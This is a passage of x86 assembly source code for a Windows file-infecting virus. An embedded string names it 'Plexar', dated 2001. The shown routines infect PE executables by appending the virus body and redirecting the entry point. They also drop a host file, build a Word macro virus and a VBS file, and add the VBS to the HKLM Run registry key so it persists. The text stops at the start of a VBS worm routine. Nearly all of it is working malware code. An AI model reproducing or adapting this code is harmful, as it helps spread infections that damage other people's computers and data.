|
ORG $-4
|
|||
|
GuardaEBP DD 00000000h
|
|||
|
|
|||
|
PUSH NULL
|
|||
|
CALL [EBX+ExitThread]
|
|||
|
|
|||
|
RET
|
|||
|
|
|||
|
ENDIF
|
|||
|
|
|||
|
@Infecta_Este_Exe:
|
|||
|
CALL Infecta_PE
|
|||
|
JMP @Retorna_Directa
|
|||
|
|
|||
|
Directa ENDP
|
|||
|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|||
|
; Proceso para infectar un PE.
|
|||
|
;
|
|||
|
; EBX -> Archivo a infectar
|
|||
|
|
|||
|
Infecta_PE PROC
|
|||
|
|
|||
|
PUSHAD
|
|||
|
|
|||
|
PUSH DWO [HostBack]
|
|||
|
POP DWO [Guarda_EIP]
|
|||
|
|
|||
|
CALL @Seh_IPE
|
|||
|
|
|||
|
MOV ESP, [ESP+8h]
|
|||
|
JMP @PEF
|
|||
|
|
|||
|
@Seh_IPE:
|
|||
|
|
|||
|
XOR EAX, EAX
|
|||
|
PUSH DWORD PTR FS:[EAX]
|
|||
|
MOV FS:[EAX], ESP
|
|||
|
|
|||
|
PUSH 019d
|
|||
|
POP ECX
|
|||
|
|
|||
|
MOV ESI, EBX
|
|||
|
LEA EDX, OFS [CRCNoInf]
|
|||
|
|
|||
|
@CicloNo:
|
|||
|
|
|||
|
PUSH 04h
|
|||
|
POP EDI
|
|||
|
PUSH EBX
|
|||
|
PUSH ESI
|
|||
|
PUSH EDX
|
|||
|
PUSH ECX
|
|||
|
CALL CRC32
|
|||
|
POP ECX
|
|||
|
POP EDX
|
|||
|
POP ESI
|
|||
|
POP EBX
|
|||
|
CMP EAX, DWORD PTR [EDX]
|
|||
|
JZ @PEF
|
|||
|
ADD EDX, 4h
|
|||
|
LOOP @CicloNo
|
|||
|
|
|||
|
PUSH 00000000h
|
|||
|
PUSH EBX
|
|||
|
APICALL SetFileAttributesA
|
|||
|
|
|||
|
XOR EAX, EAX
|
|||
|
PUSH EAX
|
|||
|
PUSH 00000000h
|
|||
|
PUSH OPEN_EXISTING
|
|||
|
PUSH EAX
|
|||
|
PUSH EAX
|
|||
|
PUSH GENERIC_READ + GENERIC_WRITE
|
|||
|
PUSH EBX
|
|||
|
APICALL CreateFileA
|
|||
|
MOV DWO [FHandle], EAX
|
|||
|
INC EAX
|
|||
|
JZ @PEF
|
|||
|
|
|||
|
DEC EAX
|
|||
|
PUSH NULL
|
|||
|
PUSH EAX
|
|||
|
APICALL GetFileSize
|
|||
|
MOV DWO [Tama<EFBFBD>o_1], EAX
|
|||
|
INC EAX
|
|||
|
JZ @PE_Close
|
|||
|
DEC EAX
|
|||
|
|
|||
|
CMP EAX, 8192d
|
|||
|
JB @PE_Close
|
|||
|
|
|||
|
ADD EAX, Virus_Tama<EFBFBD>o + 1400h
|
|||
|
MOV DWO [Tama<EFBFBD>o_2], EAX
|
|||
|
|
|||
|
XOR EDX, EDX
|
|||
|
PUSH EDX
|
|||
|
PUSH EAX
|
|||
|
PUSH EDX
|
|||
|
PUSH PAGE_READWRITE
|
|||
|
PUSH EDX
|
|||
|
PUSH DWO [FHandle]
|
|||
|
APICALL CreateFileMappingA
|
|||
|
MOV DWO [MHandle], EAX
|
|||
|
OR EAX, EAX
|
|||
|
JZ @PE_Close
|
|||
|
|
|||
|
XOR EDX, EDX
|
|||
|
PUSH DWO [Tama<EFBFBD>o_2]
|
|||
|
PUSH EDX
|
|||
|
PUSH EDX
|
|||
|
PUSH FILE_MAP_WRITE
|
|||
|
PUSH EAX
|
|||
|
APICALL MapViewOfFile
|
|||
|
MOV DWO [BaseMap], EAX
|
|||
|
OR EAX, EAX
|
|||
|
JZ @PE_CloseMap
|
|||
|
|
|||
|
MOV EDI, EAX
|
|||
|
MOV BX, WORD PTR [EDI]
|
|||
|
AND BX, 3ED4h ; "ZM" = 5A4Dh ^ 3ED4h == 1444h
|
|||
|
ADD BX, BX
|
|||
|
XOR BX, 3488h
|
|||
|
JNZ @PE_UnMap
|
|||
|
|
|||
|
MOV EBX, DWORD PTR [EDI+3Ch]
|
|||
|
ADD EBX, EDI
|
|||
|
CMP EBX, DWO [BaseMap]
|
|||
|
JB @PE_UnMap
|
|||
|
MOV EDX, DWO [BaseMap]
|
|||
|
ADD EDX, DWO [Tama<EFBFBD>o_1]
|
|||
|
CMP EBX, EDX
|
|||
|
JA @Pe_UnMap
|
|||
|
|
|||
|
ADD EDI, [EDI+3Ch]
|
|||
|
MOV BX, WORD PTR [EDI]
|
|||
|
OR BX, 0AEDAh ; "EP" = 4550h | 0AEDAh == 0EFDAh
|
|||
|
SUB BX, 0EFDAh
|
|||
|
JNZ @PE_UnMap
|
|||
|
|
|||
|
MOV ESI, EDI
|
|||
|
PUSHAD
|
|||
|
ADD ESI, 4Ch
|
|||
|
MOV EDI, 5h
|
|||
|
CALL CRC32
|
|||
|
CMP EAX, CRC_PLXR
|
|||
|
POPAD
|
|||
|
JE @PE_UnMap
|
|||
|
|
|||
|
MOV EAX, "rxlp" XOR 0C3E8F2A8h
|
|||
|
XOR EAX, 0C3E8F2A8h
|
|||
|
MOV DWORD PTR [EDI+4Ch], EAX
|
|||
|
|
|||
|
ADD ESI, 18h
|
|||
|
MOVZX EAX, WORD PTR [EDI+14h]
|
|||
|
ADD ESI, EAX
|
|||
|
|
|||
|
XOR EDX, EDX
|
|||
|
MOVZX EDX, WORD PTR [EDI+06h]
|
|||
|
DEC EDX
|
|||
|
IMUL EDX, 28h
|
|||
|
ADD ESI, EDX
|
|||
|
|
|||
|
OR DWORD PTR [ESI+24h], 0A0000020h
|
|||
|
|
|||
|
MOV EAX, DWORD PTR [ESI+08h]
|
|||
|
PUSH EAX
|
|||
|
ADD EAX, Virus_Tama<EFBFBD>o + 400h
|
|||
|
MOV DWORD PTR [ESI+08h], EAX
|
|||
|
|
|||
|
MOV EBX, DWORD PTR [EDI+3Ch]
|
|||
|
XOR EDX, EDX
|
|||
|
DIV EBX
|
|||
|
INC EAX
|
|||
|
MUL EBX
|
|||
|
|
|||
|
MOV DWORD PTR [ESI+10h], EAX
|
|||
|
|
|||
|
MOV EAX, DWORD PTR [ESI+10h]
|
|||
|
ADD EAX, DWORD PTR [ESI+0Ch]
|
|||
|
MOV DWORD PTR [EDI+50h], EAX
|
|||
|
|
|||
|
POP EDX
|
|||
|
|
|||
|
MOV EAX, DWORD PTR [EDI+28h]
|
|||
|
ADD EAX, DWORD PTR [EDI+34h]
|
|||
|
MOV DWO [HostBack], EAX
|
|||
|
|
|||
|
ADD EDX, DWORD PTR [ESI+0Ch]
|
|||
|
MOV DWORD PTR [EDI+28h], EDX
|
|||
|
|
|||
|
PUSH EBP
|
|||
|
PUSH EBX
|
|||
|
INC ESP
|
|||
|
|
|||
|
POP EBX ; \
|
|||
|
DEC ESP ; \
|
|||
|
PUSH EBX ; > "[LSX]" Cadena Ejecutable.
|
|||
|
POP EAX ; /
|
|||
|
POP EBP ; /
|
|||
|
|
|||
|
MOV EDI, DWORD PTR [ESI+14h]
|
|||
|
ADD EDI, DWORD PTR [ESI+08h]
|
|||
|
ADD EDI, DWO [BaseMap]
|
|||
|
MOV ECX, Virus_Tama<EFBFBD>o / 4
|
|||
|
SUB EDI, Virus_Tama<EFBFBD>o + 400h
|
|||
|
LEA ESI, OFS [Empieza_Plexar]
|
|||
|
CALL PXPE
|
|||
|
|
|||
|
PUSH DWO [Tama<EFBFBD>o_2]
|
|||
|
POP DWO [Tama<EFBFBD>o_1]
|
|||
|
|
|||
|
@PE_UnMap:
|
|||
|
|
|||
|
XOR EAX, EAX
|
|||
|
PUSH EAX
|
|||
|
PUSH EAX
|
|||
|
PUSH DWO [Tama<EFBFBD>o_1]
|
|||
|
PUSH DWO [FHandle]
|
|||
|
APICALL SetFilePointer
|
|||
|
|
|||
|
PUSH DWO [FHandle]
|
|||
|
APICALL SetEndOfFile
|
|||
|
|
|||
|
PUSH DWO [BaseMap]
|
|||
|
APICALL UnmapViewOfFile
|
|||
|
|
|||
|
@PE_CloseMap:
|
|||
|
|
|||
|
PUSH DWO [MHandle]
|
|||
|
APICALL CloseHandle
|
|||
|
|
|||
|
@PE_Close:
|
|||
|
|
|||
|
PUSH DWO [FHandle]
|
|||
|
APICALL CloseHandle
|
|||
|
|
|||
|
@PEF:
|
|||
|
|
|||
|
XOR ECX, ECX
|
|||
|
POP DWORD PTR FS:[ECX]
|
|||
|
POP ECX
|
|||
|
|
|||
|
PUSH DWO [Guarda_EIP]
|
|||
|
POP DWO [HostBack]
|
|||
|
|
|||
|
POPAD
|
|||
|
RET
|
|||
|
|
|||
|
Infecta_PE ENDP
|
|||
|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|||
|
; Este proceso suelta en disco un archivo PE vacio.
|
|||
|
;
|
|||
|
; EBX -> Nombre
|
|||
|
|
|||
|
Droppear_PE PROC
|
|||
|
PUSHAD
|
|||
|
|
|||
|
XOR EAX, EAX
|
|||
|
PUSH EAX
|
|||
|
PUSH FILE_ATTRIBUTE_NORMAL
|
|||
|
PUSH CREATE_ALWAYS
|
|||
|
PUSH EAX
|
|||
|
PUSH EAX
|
|||
|
PUSH GENERIC_READ + GENERIC_WRITE
|
|||
|
PUSH EBX
|
|||
|
APICALL CreateFileA
|
|||
|
MOV DWO [FHandle_DPE], EAX
|
|||
|
INC EAX
|
|||
|
JZ @Fin_DPE
|
|||
|
DEC EAX
|
|||
|
|
|||
|
XOR EBX, EBX
|
|||
|
PUSH EBX
|
|||
|
PUSH 32768d
|
|||
|
PUSH EBX
|
|||
|
PUSH PAGE_READWRITE
|
|||
|
PUSH EBX
|
|||
|
PUSH EAX
|
|||
|
APICALL CreateFileMappingA
|
|||
|
MOV DWO [MHandle_DPE], EAX
|
|||
|
OR EAX, EAX
|
|||
|
JZ @DPE_Cierra
|
|||
|
|
|||
|
XOR EBX, EBX
|
|||
|
PUSH 32768d
|
|||
|
PUSH EBX
|
|||
|
PUSH EBX
|
|||
|
PUSH FILE_MAP_WRITE
|
|||
|
PUSH EAX
|
|||
|
APICALL MapViewOfFile
|
|||
|
MOV DWO [BaseMap_DPE], EAX
|
|||
|
OR EAX, EAX
|
|||
|
JZ @DPE_CierraMap
|
|||
|
|
|||
|
PUSH EAX
|
|||
|
LEA EAX, OFS [Dropper]
|
|||
|
PUSH EAX
|
|||
|
CALL _aP_depack_asm
|
|||
|
ADD ESP, 08h
|
|||
|
|
|||
|
XOR EBX, EBX
|
|||
|
PUSH EBX
|
|||
|
PUSH EBX
|
|||
|
PUSH EAX
|
|||
|
PUSH DWO [FHandle_DPE]
|
|||
|
APICALL SetFilePointer
|
|||
|
|
|||
|
@DPE_DesMapea:
|
|||
|
|
|||
|
PUSH DWO [BaseMap_DPE]
|
|||
|
APICALL UnmapViewOfFile
|
|||
|
|
|||
|
@DPE_CierraMap:
|
|||
|
|
|||
|
PUSH DWO [MHandle_DPE]
|
|||
|
APICALL CloseHandle
|
|||
|
|
|||
|
@DPE_Cierra:
|
|||
|
|
|||
|
PUSH DWO [FHandle_DPE]
|
|||
|
APICALL SetEndOfFile
|
|||
|
|
|||
|
PUSH DWO [FHandle_DPE]
|
|||
|
APICALL CloseHandle
|
|||
|
|
|||
|
POPAD
|
|||
|
RET
|
|||
|
|
|||
|
@Fin_DPE:
|
|||
|
|
|||
|
POPAD
|
|||
|
STC
|
|||
|
RET
|
|||
|
|
|||
|
Droppear_PE ENDP
|
|||
|
|
|||
|
DB 00h, 00h
|
|||
|
DB "< Virus Plexar (c) Julio/Agosto 2001 - Escrito por LiteSys >"
|
|||
|
DB 00h, 00h
|
|||
|
DB "[ Hecho en Venezuela ]"
|
|||
|
DB 00h, 00h
|
|||
|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|||
|
; Proceso para soltar el virus macro de Word.
|
|||
|
|
|||
|
Infecta_Word PROC Pascal DeltaOfs:DWORD
|
|||
|
|
|||
|
PUSHAD
|
|||
|
|
|||
|
MOV EBP, DeltaOfs
|
|||
|
|
|||
|
CALL @SEH_3
|
|||
|
|
|||
|
MOV ESP, DWORD PTR [ESP+8h]
|
|||
|
JMP @IW_Fin
|
|||
|
|
|||
|
@SEH_3:
|
|||
|
|
|||
|
XOR EAX, EAX
|
|||
|
PUSH DWORD PTR FS:[EAX]
|
|||
|
MOV FS:[EAX], ESP
|
|||
|
|
|||
|
PUSH PAGE_READWRITE
|
|||
|
PUSH MEM_COMMIT + MEM_RESERVE + MEM_TOP_DOWN
|
|||
|
PUSH MAX_PATH
|
|||
|
PUSH NULL
|
|||
|
APICALL VirtualAlloc
|
|||
|
MOV DWO [VFreeZ], EAX
|
|||
|
OR EAX, EAX
|
|||
|
JZ @IW_Fin
|
|||
|
|
|||
|
PUSH MAX_PATH
|
|||
|
PUSH EAX
|
|||
|
APICALL GetWindowsDirectoryA
|
|||
|
OR EAX, EAX
|
|||
|
JZ @IW_Fin
|
|||
|
|
|||
|
PUSH DWO [VFreeZ]
|
|||
|
APICALL SetCurrentDirectoryA
|
|||
|
OR EAX, EAX
|
|||
|
JZ @IW_Fin
|
|||
|
|
|||
|
PUSH MEM_DECOMMIT
|
|||
|
PUSH MAX_PATH
|
|||
|
PUSH 12345678h
|
|||
|
ORG $-4
|
|||
|
VFreeZ DD 00000000h
|
|||
|
APICALL VirtualFree
|
|||
|
|
|||
|
LEA EBX, OFS [WScript_Exe]
|
|||
|
CALL @Existe_Archivo
|
|||
|
JNC @VBS_Fin
|
|||
|
|
|||
|
LEA EBX, OFS [Raxelp_$$$]
|
|||
|
CALL @Existe_Archivo
|
|||
|
JC @IW_Fin
|
|||
|
|
|||
|
LEA EDI, OFS [Macaco]
|
|||
|
PUSH 08h
|
|||
|
POP ECX
|
|||
|
@IW2:
|
|||
|
PUSH 25d
|
|||
|
POP EBX
|
|||
|
CALL Random
|
|||
|
ADD EAX, 65d
|
|||
|
STOSB
|
|||
|
LOOP @IW2
|
|||
|
|
|||
|
MOV EAX, "$$$."
|
|||
|
STOSD
|
|||
|
XOR AL, AL
|
|||
|
STOSB
|
|||
|
|
|||
|
LEA EBX, OFS [Macaco]
|
|||
|
CALL Droppear_PE
|
|||
|
JC @IW_Fin
|
|||
|
|
|||
|
LEA EBX, OFS [Macaco]
|
|||
|
CALL Infecta_PE
|
|||
|
|
|||
|
XOR EAX, EAX
|
|||
|
PUSH EAX
|
|||
|
PUSH FILE_ATTRIBUTE_NORMAL
|
|||
|
PUSH OPEN_EXISTING
|
|||
|
PUSH EAX
|
|||
|
PUSH EAX
|
|||
|
PUSH GENERIC_READ + GENERIC_WRITE
|
|||
|
LEA EAX, OFS [Macaco]
|
|||
|
PUSH EAX
|
|||
|
APICALL CreateFileA
|
|||
|
MOV DWO [FHandle_IW], EAX
|
|||
|
INC EAX
|
|||
|
JZ @IW_Fin
|
|||
|
DEC EAX
|
|||
|
|
|||
|
PUSH NULL
|
|||
|
PUSH EAX
|
|||
|
APICALL GetFileSize
|
|||
|
MOV DWO [Tama<EFBFBD>o_IW], EAX
|
|||
|
INC EAX
|
|||
|
JZ @IW_CierraFile
|
|||
|
|
|||
|
XOR EAX, EAX
|
|||
|
PUSH EAX
|
|||
|
PUSH EAX
|
|||
|
PUSH EAX
|
|||
|
PUSH PAGE_READWRITE
|
|||
|
PUSH EAX
|
|||
|
PUSH DWO [FHandle_IW]
|
|||
|
APICALL CreateFileMappingA
|
|||
|
MOV DWO [MHandle], EAX
|
|||
|
OR EAX, EAX
|
|||
|
JZ @IW_CierraFile
|
|||
|
|
|||
|
XOR EBX, EBX
|
|||
|
PUSH EBX
|
|||
|
PUSH EBX
|
|||
|
PUSH EBX
|
|||
|
PUSH FILE_MAP_READ + FILE_MAP_WRITE
|
|||
|
PUSH EAX
|
|||
|
APICALL MapViewOfFile
|
|||
|
MOV DWO [BaseMap_IW], EAX
|
|||
|
OR EAX, EAX
|
|||
|
JZ @IW_CierraMap
|
|||
|
|
|||
|
PUSH PAGE_READWRITE
|
|||
|
PUSH MEM_COMMIT + MEM_RESERVE + MEM_TOP_DOWN
|
|||
|
MOV EAX, DWO [Tama<EFBFBD>o_IW]
|
|||
|
ADD EAX, EAX
|
|||
|
ADD EAX, 1000h
|
|||
|
PUSH EAX
|
|||
|
PUSH NULL
|
|||
|
APICALL VirtualAlloc
|
|||
|
MOV DWO [Memoria_IW], EAX
|
|||
|
OR EAX, EAX
|
|||
|
JZ @IW_Fin
|
|||
|
|
|||
|
MOV ECX, DWO [Tama<EFBFBD>o_IW]
|
|||
|
MOV EDI, EAX
|
|||
|
MOV ESI, DWO [BaseMap_IW]
|
|||
|
|
|||
|
@Conve:
|
|||
|
|
|||
|
LODSB
|
|||
|
CALL @Hexa
|
|||
|
STOSW
|
|||
|
|
|||
|
LOOP @Conve
|
|||
|
|
|||
|
XOR EAX, EAX
|
|||
|
STOSD
|
|||
|
|
|||
|
PUSH DWO [BaseMap_IW]
|
|||
|
APICALL UnmapViewOfFile
|
|||
|
|
|||
|
PUSH DWO [MHandle_IW]
|
|||
|
APICALL CloseHandle
|
|||
|
|
|||
|
PUSH DWO [FHandle_IW]
|
|||
|
APICALL CloseHandle
|
|||
|
|
|||
|
XOR EAX, EAX
|
|||
|
PUSH EAX
|
|||
|
PUSH FILE_ATTRIBUTE_NORMAL
|
|||
|
PUSH CREATE_NEW
|
|||
|
PUSH EAX
|
|||
|
PUSH EAX
|
|||
|
PUSH GENERIC_READ + GENERIC_WRITE
|
|||
|
LEA EAX, OFS [Raxelp_$$$]
|
|||
|
PUSH EAX
|
|||
|
APICALL CreateFileA
|
|||
|
MOV DWO [FHandle_IW], EAX
|
|||
|
INC EAX
|
|||
|
JZ @IW_Fin
|
|||
|
|
|||
|
DEC EAX
|
|||
|
XOR EBX, EBX
|
|||
|
PUSH EBX
|
|||
|
PUSH 131072d
|
|||
|
PUSH EBX
|
|||
|
PUSH PAGE_READWRITE
|
|||
|
PUSH EBX
|
|||
|
PUSH EAX
|
|||
|
APICALL CreateFileMappingA
|
|||
|
MOV DWO [MHandle_IW], EAX
|
|||
|
OR EAX, EAX
|
|||
|
JZ @IW_CierraFile
|
|||
|
|
|||
|
XOR EBX, EBX
|
|||
|
PUSH EBX
|
|||
|
PUSH EBX
|
|||
|
PUSH EBX
|
|||
|
PUSH FILE_MAP_READ + FILE_MAP_WRITE
|
|||
|
PUSH EAX
|
|||
|
APICALL MapViewOfFile
|
|||
|
MOV DWO [BaseMap_IW], EAX
|
|||
|
OR EAX, EAX
|
|||
|
JZ @IW_CierraMap
|
|||
|
|
|||
|
MOV EDI, EAX
|
|||
|
LEA ESI, OFS [Virus_Macro]
|
|||
|
PUSH L_Virus_Macro
|
|||
|
POP ECX
|
|||
|
REP MOVSB
|
|||
|
|
|||
|
MOV ESI, DWO [Memoria_IW]
|
|||
|
XOR EDX, EDX
|
|||
|
XOR EAX, EAX
|
|||
|
|
|||
|
@IW_B:
|
|||
|
|
|||
|
MOVSB
|
|||
|
INC EDX
|
|||
|
CMP EDX, 200d
|
|||
|
JNZ @IW_D
|
|||
|
|
|||
|
MOV AL, '"'
|
|||
|
STOSB
|
|||
|
MOV AX, 0A0Dh
|
|||
|
STOSW
|
|||
|
MOV EAX, "adoj"
|
|||
|
STOSD
|
|||
|
MOV EAX, 'j = '
|
|||
|
STOSD
|
|||
|
MOV EAX, " ado"
|
|||
|
STOSD
|
|||
|
MOV AX, " +"
|
|||
|
STOSW
|
|||
|
MOV AL, '"'
|
|||
|
STOSB
|
|||
|
|
|||
|
; joda = joda + "
|
|||
|
|
|||
|
XOR EAX, EAX
|
|||
|
XOR EDX, EDX
|
|||
|
|
|||
|
@IW_D:
|
|||
|
|
|||
|
CMP BYTE PTR [ESI], AL
|
|||
|
JNZ @IW_B
|
|||
|
|
|||
|
MOV AL, '"'
|
|||
|
STOSB
|
|||
|
MOV AX, 0A0Dh
|
|||
|
STOSW
|
|||
|
|
|||
|
LEA ESI, OFS [Virus_Macro_2]
|
|||
|
PUSH L_Virus_Macro_2
|
|||
|
POP ECX
|
|||
|
REP MOVSB
|
|||
|
|
|||
|
PUSH DWO [BaseMap_IW]
|
|||
|
APICALL UnmapViewOfFile
|
|||
|
|
|||
|
PUSH DWO [MHandle_IW]
|
|||
|
APICALL CloseHandle
|
|||
|
|
|||
|
SUB EDI, DWO [BaseMap_IW]
|
|||
|
XOR EBX, EBX
|
|||
|
PUSH EBX
|
|||
|
PUSH EBX
|
|||
|
PUSH EDI
|
|||
|
PUSH DWO [FHandle_IW]
|
|||
|
APICALL SetFilePointer
|
|||
|
|
|||
|
PUSH DWO [FHandle_IW]
|
|||
|
APICALL SetEndOfFile
|
|||
|
|
|||
|
PUSH DWO [FHandle_IW]
|
|||
|
APICALL CloseHandle
|
|||
|
|
|||
|
PUSH MEM_DECOMMIT
|
|||
|
MOV EAX, DWO [Tama<EFBFBD>o_IW]
|
|||
|
ADD EAX, EAX
|
|||
|
ADD EAX, 1000h
|
|||
|
PUSH EAX
|
|||
|
PUSH DWO [Memoria_IW]
|
|||
|
APICALL VirtualFree
|
|||
|
|
|||
|
XOR EAX, EAX
|
|||
|
PUSH EAX
|
|||
|
PUSH FILE_ATTRIBUTE_NORMAL
|
|||
|
PUSH CREATE_ALWAYS
|
|||
|
PUSH EAX
|
|||
|
PUSH EAX
|
|||
|
PUSH GENERIC_WRITE
|
|||
|
LEA EBX, OFS [Plxwrd_vbs]
|
|||
|
PUSH EBX
|
|||
|
APICALL CreateFileA
|
|||
|
MOV DWO [FHandle], EAX
|
|||
|
INC EAX
|
|||
|
JZ @IW_Fin
|
|||
|
DEC EAX
|
|||
|
|
|||
|
XOR EBX, EBX
|
|||
|
PUSH EBX
|
|||
|
LEA EDX, OFS [Scriptum]
|
|||
|
PUSH EDX
|
|||
|
PUSH Largo_MVBS
|
|||
|
LEA EDX, OFS [Macro_VBS]
|
|||
|
PUSH EDX
|
|||
|
PUSH EAX
|
|||
|
APICALL WriteFile
|
|||
|
|
|||
|
PUSH DWO [FHandle_IW]
|
|||
|
APICALL CloseHandle
|
|||
|
|
|||
|
CALL @IW_Q
|
|||
|
DB "SHLWAPI.DLL", 00h
|
|||
|
@IW_Q: APICALL LoadLibraryA
|
|||
|
OR EAX, EAX
|
|||
|
JZ @IW_Fin
|
|||
|
|
|||
|
CALL @IW_K
|
|||
|
DB "SHSetValueA", 00h
|
|||
|
@IW_K: PUSH EAX
|
|||
|
APICALL GetProcAddress
|
|||
|
OR EAX, EAX
|
|||
|
JZ @IW_Fin
|
|||
|
|
|||
|
PUSH 11d
|
|||
|
LEA EBX, OFS [Plxwrd_vbs]
|
|||
|
PUSH EBX
|
|||
|
PUSH REG_SZ
|
|||
|
CALL @IW_L
|
|||
|
DB "Plexar", 00h
|
|||
|
@IW_L: CALL @IW_M
|
|||
|
DB "Software\Microsoft\Windows\CurrentVersion\Run", 00h
|
|||
|
@IW_M: PUSH HKEY_LOCAL_MACHINE
|
|||
|
CALL EAX
|
|||
|
|
|||
|
@IW_Fin:
|
|||
|
|
|||
|
XOR ECX, ECX
|
|||
|
POP DWORD PTR FS:[ECX]
|
|||
|
POP ECX
|
|||
|
|
|||
|
IF DEBUG
|
|||
|
|
|||
|
POPAD
|
|||
|
RET
|
|||
|
|
|||
|
ELSE
|
|||
|
|
|||
|
MOV DWO [GuardaEBP2], EBP
|
|||
|
POPAD
|
|||
|
|
|||
|
MOV EBX, 12345678h
|
|||
|
ORG $-4
|
|||
|
GuardaEBP2 DD 00000000h
|
|||
|
|
|||
|
PUSH NULL
|
|||
|
CALL [EBX+ExitThread]
|
|||
|
|
|||
|
RET
|
|||
|
|
|||
|
ENDIF
|
|||
|
|
|||
|
@IW_CierraMap:
|
|||
|
|
|||
|
PUSH DWO [MHandle_IW]
|
|||
|
APICALL CloseHandle
|
|||
|
|
|||
|
@IW_CierraFile:
|
|||
|
|
|||
|
PUSH DWO [FHandle_IW]
|
|||
|
APICALL CloseHandle
|
|||
|
JMP @IW_Fin
|
|||
|
|
|||
|
; Convierte un numero a su representacion ASCII en Hex.
|
|||
|
|
|||
|
@Hexa:
|
|||
|
|
|||
|
PUSH ECX
|
|||
|
PUSH EDI
|
|||
|
|
|||
|
XOR ECX, ECX
|
|||
|
MOV CL, AL
|
|||
|
PUSH ECX
|
|||
|
SHR CL, 04h
|
|||
|
LEA EDI, OFS [Tabla_Hex]
|
|||
|
INC CL
|
|||
|
|
|||
|
@@Y:
|
|||
|
INC EDI
|
|||
|
DEC CL
|
|||
|
JNZ @@Y
|
|||
|
|
|||
|
DEC EDI
|
|||
|
MOV AL, BYTE PTR [EDI] ; Pasa el numero exacto de la tabla
|
|||
|
POP ECX
|
|||
|
AND CL, 0Fh
|
|||
|
LEA EDI, OFS [Tabla_Hex]
|
|||
|
INC CL
|
|||
|
|
|||
|
@@X:
|
|||
|
INC EDI
|
|||
|
DEC CL
|
|||
|
JNZ @@X
|
|||
|
|
|||
|
DEC EDI
|
|||
|
MOV AH, BYTE PTR [EDI] ; Pasa el numero exacto de la tabla
|
|||
|
POP EDI
|
|||
|
POP ECX
|
|||
|
|
|||
|
RET 00h
|
|||
|
|
|||
|
Infecta_Word ENDP
|
|||
|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|||
|
Worm_VBS PROC Pascal DeltaOfs:DWORD
|
|||
|
|
|||
|
PUSHAD
|
|||
|
|
|||
|
MOV EBP, DeltaOfs
|
|||
|
|
|||
|
CALL @SEH_4
|
|||
|
|
|||
|
MOV ESP, DWORD PTR [ESP+8h]
|
|||
|
JMP @VBS_Fin
|
|||
|
|
|||
|
@SEH_4:
|
|||
|
|
|||
|
XOR EAX, EAX
|
|||
|
PUSH DWORD PTR FS:[EAX]
|
|||
|
